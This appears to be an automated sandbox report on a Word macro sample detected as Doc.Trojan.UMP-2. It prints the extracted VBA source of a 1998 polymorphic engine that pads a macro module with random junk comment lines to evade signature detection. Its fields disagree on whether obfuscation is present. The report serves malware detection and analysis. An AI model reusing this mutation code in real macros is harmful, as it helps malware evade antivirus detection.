MALICIOUS
80
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The critical ClamAV heuristic indicates a detected trojan within an extracted artifact, and the medium heuristic confirms the presence of VBA macros. The extracted VBA code, named 'UMPE', suggests a polymorphic engine designed to obfuscate its functionality, likely to evade detection and execute a malicious payload. The specific purpose of the obfuscated code is not fully discernible due to its polymorphic nature.
Heuristics 1
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 814 bytes |
SHA-256: 60c622ccc8bc11b578c6c0d73b5d64315513ad446921cc94f0602f10115c520a |
|||
|
Detection
ClamAV:
Doc.Trojan.UMP-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Модуль1"
Sub UMPE()
'ULTRAS MACRO POLYMORPHIC ENGINE for Word97
'ULTRAS 1998
MuNu = Int(Rnd() * 20 + 1)
For Mutate = 1 To MuNu
MuRL = Application.VBE.ActiveVBProject.VBComponents("zzz").CodeModule.CountOfLines
MuLi = Int(Rnd() * MuRL + 1)
MuLe = Int(Rnd() * 40 + 1)
For MuGe = 1 To MuLe
LiVe = Int((120 - 100 + 1) * Rnd + 228)
MuRe = MuRe + Chr$(LiVe)
Next MuGe
Application.VBE.ActiveVBProject.VBComponents("zzz").CodeModule.InsertLines MuLi, vbTab & "' " & MuRe
MuRe = ""
Next Mutate
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.